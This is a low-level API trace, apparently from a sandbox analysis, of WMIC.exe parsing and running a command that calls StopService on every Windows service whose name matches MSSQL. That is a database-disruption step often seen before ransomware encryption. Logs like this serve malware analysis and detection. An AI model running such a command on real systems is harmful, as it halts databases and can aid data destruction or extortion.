[0240.593] SysStringLen (param_1="TABLE") returned 0x5 [0240.593] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0240.593] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.593] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0240.593] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.593] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0240.593] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.593] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.593] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0240.593] malloc (_Size=0x30) returned 0x4384c0 [0240.593] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.593] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.593] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.593] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=18, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.593] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="mof.xsl") returned 0x0 [0240.594] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.594] malloc (_Size=0x18) returned 0x43c9a0 [0240.594] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.594] free (_Block=0x43c9a0) [0240.594] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0240.594] malloc (_Size=0x18) returned 0x43c9a0 [0240.594] malloc (_Size=0x18) returned 0x43c9c0 [0240.594] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.594] SysStringLen (param_1="TABLE") returned 0x5 [0240.594] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.594] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.594] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.594] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.594] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.594] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0240.594] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.594] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0240.595] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.595] SysStringLen (param_1="wmiclimofformat") returned 0xf [0240.595] malloc (_Size=0x30) returned 0x438500 [0240.595] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.595] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.595] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.595] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=19, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.595] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="textvaluelist.xsl") returned 0x0 [0240.595] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.595] malloc (_Size=0x18) returned 0x43c9e0 [0240.595] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.595] free (_Block=0x43c9e0) [0240.596] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0240.596] malloc (_Size=0x18) returned 0x43c9e0 [0240.596] malloc (_Size=0x18) returned 0x43ca00 [0240.596] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.596] SysStringLen (param_1="TABLE") returned 0x5 [0240.596] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.596] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.596] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.596] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.596] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.596] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.596] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.596] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.596] malloc (_Size=0x30) returned 0x438540 [0240.596] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.596] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.596] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.596] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=20, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.596] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="textvaluelist.xsl") returned 0x0 [0240.596] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.597] malloc (_Size=0x18) returned 0x43ca20 [0240.597] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.597] free (_Block=0x43ca20) [0240.597] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0240.597] malloc (_Size=0x18) returned 0x43ca20 [0240.597] malloc (_Size=0x18) returned 0x43ca40 [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] SysStringLen (param_1="TABLE") returned 0x5 [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0240.597] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0240.597] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0240.597] malloc (_Size=0x30) returned 0x438580 [0240.597] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.597] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.597] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.598] IUnknown:Release (This=0x1b69cc0) returned 0x0 [0240.598] FreeThreadedDOMDocument:IUnknown:Release (This=0x1b6bc50) returned 0x1 [0240.598] FreeThreadedDOMDocument:IUnknown:Release (This=0x1b671d0) returned 0x0 [0240.598] free (_Block=0x436f00) [0240.598] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" [0240.598] malloc (_Size=0xd0) returned 0x43cd30 [0240.598] memcpy_s (in: _Destination=0x43cd30, _DestinationSize=0xce, _Source=0x1c25ee, _SourceSize=0xcc | out: _Destination=0x43cd30) returned 0x0 [0240.598] malloc (_Size=0x18) returned 0x43ca60 [0240.598] malloc (_Size=0x18) returned 0x43ca80 [0240.598] malloc (_Size=0x18) returned 0x43caa0 [0240.598] malloc (_Size=0x18) returned 0x43cac0 [0240.598] malloc (_Size=0x80) returned 0x436f00 [0240.598] GetLocalTime (in: lpSystemTime=0x1af690 | out: lpSystemTime=0x1af690*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x29, wSecond=0x3b, wMilliseconds=0x220)) [0240.598] _vsnwprintf (in: _Buffer=0x436f00, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1af5e8 | out: _Buffer="04-28-2020T20:41:59") returned 19 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] malloc (_Size=0x88) returned 0x43ce10 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] malloc (_Size=0x88) returned 0x43cea0 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] malloc (_Size=0xa) returned 0x43cae0 [0240.599] lstrlenW (lpString="path") returned 4 [0240.599] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0240.599] malloc (_Size=0xa) returned 0x43cb00 [0240.599] malloc (_Size=0x8) returned 0x436f90 [0240.599] free (_Block=0x0) [0240.599] free (_Block=0x43cae0) [0240.599] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.599] malloc (_Size=0x1c) returned 0x437110 [0240.599] lstrlenW (lpString="Win32_Service") returned 13 [0240.599] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0240.599] malloc (_Size=0x1c) returned 0x43cf30 [0240.599] malloc (_Size=0x10) returned 0x43cae0 [0240.599] memmove_s (in: _Destination=0x43cae0, _DestinationSize=0x8, _Source=0x436f90, _SourceSize=0x8 | out: _Destination=0x43cae0) returned 0x0 [0240.599] free (_Block=0x436f90) [0240.599] free (_Block=0x0) [0240.599] free (_Block=0x437110) [0240.600] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.600] malloc (_Size=0xc) returned 0x43cb20 [0240.600] lstrlenW (lpString="where") returned 5 [0240.600] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0240.600] malloc (_Size=0xc) returned 0x43cb40 [0240.600] malloc (_Size=0x18) returned 0x43cb60 [0240.600] memmove_s (in: _Destination=0x43cb60, _DestinationSize=0x10, _Source=0x43cae0, _SourceSize=0x10 | out: _Destination=0x43cb60) returned 0x0 [0240.600] free (_Block=0x43cae0) [0240.600] free (_Block=0x0) [0240.600] free (_Block=0x43cb20) [0240.600] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.600] malloc (_Size=0x30) returned 0x4385c0 [0240.600] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0240.600] _wcsicmp (_String1="\"name like '%%MSSQL%%'\"", _String2="\"NULL\"") returned -20 [0240.600] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0240.600] lstrlenW (lpString="\"name like '%%MSSQL%%'\"") returned 23 [0240.600] malloc (_Size=0x30) returned 0x438600 [0240.600] malloc (_Size=0x20) returned 0x437110 [0240.600] memmove_s (in: _Destination=0x437110, _DestinationSize=0x18, _Source=0x43cb60, _SourceSize=0x18 | out: _Destination=0x437110) returned 0x0 [0240.600] free (_Block=0x43cb60) [0240.600] free (_Block=0x0) [0240.600] free (_Block=0x4385c0) [0240.600] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.600] malloc (_Size=0xa) returned 0x43cb60 [0240.600] lstrlenW (lpString="call") returned 4 [0240.600] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0240.600] malloc (_Size=0xa) returned 0x43cb20 [0240.600] malloc (_Size=0x30) returned 0x4385c0 [0240.601] memmove_s (in: _Destination=0x4385c0, _DestinationSize=0x20, _Source=0x437110, _SourceSize=0x20 | out: _Destination=0x4385c0) returned 0x0 [0240.601] free (_Block=0x437110) [0240.601] free (_Block=0x0) [0240.601] free (_Block=0x43cb60) [0240.601] lstrlenW (lpString=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice") returned 67 [0240.601] malloc (_Size=0x18) returned 0x43cb60 [0240.601] lstrlenW (lpString="stopservice") returned 11 [0240.601] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0240.601] malloc (_Size=0x18) returned 0x43cae0 [0240.601] free (_Block=0x0) [0240.601] free (_Block=0x43cb60) [0240.601] malloc (_Size=0x30) returned 0x438640 [0240.601] lstrlenW (lpString="QUIT") returned 4 [0240.601] lstrlenW (lpString="path") returned 4 [0240.601] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0240.601] lstrlenW (lpString="EXIT") returned 4 [0240.601] lstrlenW (lpString="path") returned 4 [0240.601] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0240.601] free (_Block=0x438640) [0240.601] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x2 [0240.601] malloc (_Size=0x30) returned 0x438640 [0240.601] lstrlenW (lpString="/") returned 1 [0240.602] lstrlenW (lpString="path") returned 4 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0240.602] lstrlenW (lpString="-") returned 1 [0240.602] lstrlenW (lpString="path") returned 4 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0240.602] lstrlenW (lpString="CLASS") returned 5 [0240.602] lstrlenW (lpString="path") returned 4 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0240.602] lstrlenW (lpString="PATH") returned 4 [0240.602] lstrlenW (lpString="path") returned 4 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0240.602] lstrlenW (lpString="/") returned 1 [0240.602] lstrlenW (lpString="Win32_Service") returned 13 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0240.602] lstrlenW (lpString="-") returned 1 [0240.602] lstrlenW (lpString="Win32_Service") returned 13 [0240.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0240.602] lstrlenW (lpString="Win32_Service") returned 13 [0240.602] malloc (_Size=0x1c) returned 0x437110 [0240.602] lstrlenW (lpString="Win32_Service") returned 13 [0240.603] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0240.603] lstrlenW (lpString="Win32_Service") returned 13 [0240.603] malloc (_Size=0x1c) returned 0x43cf60 [0240.603] lstrlenW (lpString="Win32_Service") returned 13 [0240.603] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffd70590 | out: _String=0x0, _Context=0xffffffffffd70590) returned 0x0 [0240.603] lstrlenW (lpString="") returned 0 [0240.603] lstrlenW (lpString="WHERE") returned 5 [0240.603] lstrlenW (lpString="where") returned 5 [0240.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0240.603] lstrlenW (lpString="/") returned 1 [0240.603] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0240.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="/", cchCount2=1) returned 3 [0240.603] lstrlenW (lpString="-") returned 1 [0240.603] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0240.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="-", cchCount2=1) returned 3 [0240.603] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0240.603] malloc (_Size=0x2c) returned 0x438680 [0240.603] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0240.603] lstrlenW (lpString="/") returned 1 [0240.603] lstrlenW (lpString="call") returned 4 [0240.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0240.603] lstrlenW (lpString="-") returned 1 [0240.603] lstrlenW (lpString="call") returned 4 [0240.603] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] malloc (_Size=0xa) returned 0x43cb60 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] lstrlenW (lpString="GET") returned 3 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0240.604] lstrlenW (lpString="LIST") returned 4 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0240.604] lstrlenW (lpString="SET") returned 3 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0240.604] lstrlenW (lpString="CREATE") returned 6 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0240.604] lstrlenW (lpString="CALL") returned 4 [0240.604] lstrlenW (lpString="call") returned 4 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0240.604] lstrlenW (lpString="/") returned 1 [0240.604] lstrlenW (lpString="stopservice") returned 11 [0240.604] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0240.604] lstrlenW (lpString="-") returned 1 [0240.604] lstrlenW (lpString="stopservice") returned 11 [0240.605] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0240.605] lstrlenW (lpString="stopservice") returned 11 [0240.605] malloc (_Size=0x18) returned 0x43cb80 [0240.605] lstrlenW (lpString="stopservice") returned 11 [0240.605] ??0CHString@@QEAA@XZ () returned 0x1ad238 [0240.605] GetCurrentThreadId () returned 0xb2c [0240.605] GetCurrentThreadId () returned 0xb2c [0240.605] ??0CHString@@QEAA@XZ () returned 0x1ad008 [0240.605] malloc (_Size=0x8) returned 0x437140 [0240.605] malloc (_Size=0x18) returned 0x43cba0 [0240.605] malloc (_Size=0x18) returned 0x43cbc0 [0240.605] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2d2950 | out: ppNamespace=0xff2d2950*=0x1e53a98) returned 0x0 [0240.669] free (_Block=0x43cbc0) [0240.669] CoSetProxyBlanket (pProxy=0x1e53a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0240.669] free (_Block=0x437140) [0240.669] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0240.669] free (_Block=0x43cba0) [0240.669] malloc (_Size=0x18) returned 0x43cba0 [0240.670] IWbemServices:GetObject (in: This=0x1e53a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1ad218*=0x0, ppCallResult=0x0 | out: ppObject=0x1ad218*=0x1e7bfa0, ppCallResult=0x0) returned 0x0 [0240.788] free (_Block=0x43cba0) [0240.788] IWbemClassObject:BeginMethodEnumeration (This=0x1e7bfa0, lEnumFlags=0) returned 0x0 [0240.788] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="StartService", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.788] lstrlenW (lpString="StartService") returned 12 [0240.788] lstrlenW (lpString="stopservice") returned 11 [0240.788] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0240.788] IUnknown:Release (This=0x1e7c4a0) returned 0x0 [0240.788] IWbemClassObject:NextMethod (in: This=0x1e7bfa0, lFlags=0, pstrName=0x1ad1f8*=0x0, ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x0 | out: pstrName=0x1ad1f8*="StopService", ppInSignature=0x1ad200*=0x0, ppOutSignature=0x1ad208*=0x1e7c4a0) returned 0x0 [0240.788] lstrlenW (lpString="StopService") returned 11 [0240.788] lstrlenW (lpString="stopservice") returned 11 [0240.789] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0240.789] malloc (_Size=0x70) returned 0x43cf90 [0240.789] ??0CHString@@QEAA@XZ () returned 0x1acbc8 [0240.789] GetCurrentThreadId () returned 0xb2c [0240.789] IWbemClassObject:GetNames (in: This=0x1e7c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x1acbc0 | out: pNames=0x1acbc0*="\x01ƀ\x08") returned 0x0 [0240.789] SafeArrayGetLBound (in: psa=0x264a50, nDim=0x1, plLbound=0x1acbd8 | out: plLbound=0x1acbd8) returned 0x0 [0240.789] SafeArrayGetUBound (in: psa=0x264a50, nDim=0x1, plUbound=0x1acbd4 | out: plUbound=0x1acbd4) returned 0x0 [0240.789] SafeArrayGetElement (in: psa=0x264a50, rgIndices=0x1acbb4, pv=0x1acbb8 | out: pv=0x1acbb8) returned 0x0 [0240.789] malloc (_Size=0x48) returned 0x43d010 [0240.789] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1e7c4a0, wszProperty="ReturnValue", ppQualSet=0x1aca08 | out: ppQualSet=0x1aca08*=0x1e413b0) returned 0x0 [0240.790] malloc (_Size=0x18) returned 0x43cba0 [0240.790] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="CIMTYPE", lFlags=0, pVal=0x1aca90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x1aca90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0240.790] free (_Block=0x43cba0) [0240.790] malloc (_Size=0x18) returned 0x43cba0 [0240.790] IWbemClassObject:Get (in: This=0x1e7c4a0, wszName="ReturnValue", lFlags=0, pVal=0x1acb38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1aca18*=1755744, plFlavor=0x0 | out: pVal=0x1acb38*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1aca18*=19, plFlavor=0x0) returned 0x0 [0240.790] malloc (_Size=0x18) returned 0x43cbc0 [0240.790] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="read", lFlags=0, pVal=0x1aca20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff2d2ac0), plFlavor=0x0 | out: pVal=0x1aca20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff2d2ac0), plFlavor=0x0) returned 0x80041002 [0240.790] free (_Block=0x43cbc0) [0240.790] malloc (_Size=0x18) returned 0x43cbc0 [0240.791] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="write", lFlags=0, pVal=0x1aca20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff2d2ac0), plFlavor=0x0 | out: pVal=0x1aca20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff2d2ac0), plFlavor=0x0) returned 0x80041002 [0240.791] free (_Block=0x43cbc0) [0240.791] malloc (_Size=0x18) returned 0x43cbc0 [0240.791] malloc (_Size=0x18) returned 0x43cbe0 [0240.791] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Description", lFlags=0, pVal=0x1acad0*(varType=0x0, wReserved1=0x1a, wReserved2=0x0, wReserved3=0x0, varVal1=0xff274293, varVal2=0x1acad8), plFlavor=0x0 | out: pVal=0x1acad0*(varType=0x0, wReserved1=0x1a, wReserved2=0x0, wReserved3=0x0, varVal1=0xff274293, varVal2=0x1acad8), plFlavor=0x0) returned 0x80041002 [0240.791] free (_Block=0x43cbe0) [0240.791] malloc (_Size=0x18) returned 0x43cbe0 [0240.791] lstrlenA (lpString="Not Available") returned 13 [0240.791] malloc (_Size=0x1c) returned 0x43d060 [0240.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff2622f0, cbMultiByte=-1, lpWideCharStr=0x43d060, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0240.791] free (_Block=0x43d060) [0240.791] IUnknown:Release (This=0x1e413b0) returned 0x0 [0240.791] malloc (_Size=0x48) returned 0x43d060 [0240.791] malloc (_Size=0x18) returned 0x43cc00 [0240.791] malloc (_Size=0x48) returned 0x43d0b0 [0240.791] malloc (_Size=0x70) returned 0x43d100 [0240.792] malloc (_Size=0x48) returned 0x43d180 [0240.792] free (_Block=0x43d0b0) [0240.792] free (_Block=0x43d060) [0240.792] free (_Block=0x43d010) [0240.792] free (_Block=0x43cbc0) [0240.792] free (_Block=0x43cbe0) [0240.792] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0240.792] IWbemClassObject:GetMethodQualifierSet (in: This=0x1e7bfa0, wszMethod="StopService", ppQualSet=0x1ad138 | out: ppQualSet=0x1ad138*=0x1e413b0) returned 0x0 [0240.792] malloc (_Size=0x18) returned 0x43cbe0 [0240.792] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Implemented", lFlags=0, pVal=0x1ad148*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41c0ce024f, varVal2=0xff2744fb), plFlavor=0x0 | out: pVal=0x1ad148*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41c0ce024f, varVal2=0xff2744fb), plFlavor=0x0) returned 0x80041002 [0240.792] free (_Block=0x43cbe0) [0240.792] malloc (_Size=0x18) returned 0x43cbe0 [0240.793] malloc (_Size=0x18) returned 0x43cbc0 [0240.793] IWbemQualifierSet:Get (in: This=0x1e413b0, wszName="Description", lFlags=0, pVal=0x1ad160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff2d2948, varVal2=0xb2c), plFlavor=0x0 | out: pVal=0x1ad160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xb2c), plFlavor=0x0) returned 0x0 